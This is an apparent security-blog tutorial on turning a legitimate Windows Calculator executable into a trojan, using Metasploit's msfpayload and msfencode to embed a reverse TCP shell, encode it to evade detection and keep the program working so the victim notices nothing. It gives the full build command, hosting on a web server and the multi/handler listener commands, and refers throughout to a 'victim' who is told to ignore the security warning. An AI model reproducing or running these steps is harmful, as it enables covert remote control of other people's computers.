Create and Embedd a Payload in Existing Executable


In my previous posts  i explained about  Creating our own payload  to gain access from victims machine.

But it had some problem when a targeted user launches a backdoored executable such as the one we just generated, nothing will appear to happen, and that can raise suspicions.

To improve your chances of not tipping off a target, you can launch a payload while simultaneously continuing normal execution of the launched application.

So i going to download a executable file working in windows 7, for that i choose Calculator program.

#wget -c

In this listing, we download the Calculator  executable program and then access  Calc  using the -k flag is  configures the payload to launch in a separate thread from the main executable so the application will behave normally while the payload is being executed.

When choosing to embed a payload in an executable, you should consider using GUI-based applications if you’re not specifying the -k flag. If you embed a payload into a console-based application, when the payload is run,it will display a console window that won’t close until you’re finished using the payload. If you choose a GUI-based application and do not specify the -k flag, when the payload is executed, the target will not see a console window.

Paying attention to these little details can help you remain stealthy during an engagement.

To msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.

For Msfencode Options list type msfencode   -h   in  terminal.

#msfencode -h

Screenshot from 2014-06-04 06:20:45

Let’s make our new backdoored executable.

#msfpayload windows/shell_reverse_tcp LHOST= LPORT=8080 R | msfencode -t exe -x /home/sathish/Downloads/calc.exe -k -o /var/www/calc_backdoor.exe -e x86/shikata_ga_nai -c 5

Screenshot from 2014-06-03 07:57:40

We add the R flag at to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode. We specify the x86/shikata_ga_nai encoder at the end with the count of 5 time and tell msfencode to send the executable output -o exe to /var/www/calc_backdoor.exe with -k option to keep template working; run payload in new thread. Finally, we run a quick check at to ensure that the resulting file is in fact a Windows executable.

I have already build webserver , so target machine can download the executable file from that server  and execute it. We have a functional calc.exe and our shell.

Screenshot from 2014-06-03 14:34:34

It will prompt a warning notification, Ignore and run the executable.

Screenshot from 2014-06-03 14:35:10

Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen

for reverse shell connections.


#msf > use exploit/multi/handler

#msf exploit(handler) > show options

#msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp

#msf exploit(handler) > set LHOST

#msf exploit(handler) > set LPORT 8080

Screenshot from 2014-06-03 09:05:58

We first use the multi/handler module at and get a quick display of the options at . Then, we set our payload to be a Windows reverse shell at so that it matches the behavior of the executable we created earlier, tell it the IP at and the port to listen on at , and we’re ready to go.

#msf exploit(handler) > exploit

Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer.

Screenshot from 2014-06-03 09:07:29

Then this will create a channel and  you can access the Windows and Now you will see that you access to the C drive of the victims computer, basically the drive on which the OS is installed on.

Screenshot from 2014-06-03 19:02:25


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Digital Hacker

Digital Hacker


IT Security Research and Services


About assembler and stuff

Astr0baby's not so random thoughts _____ rand() % 100;

ψυχῆς ἰατρεῖον "Hospital of the soul"

Penetration Testing Academy

Education and Advice for Rookies

P.M.C.S.P. Blog

Articles about Physics, Math, Computer Security & Programming and more

%d bloggers like this: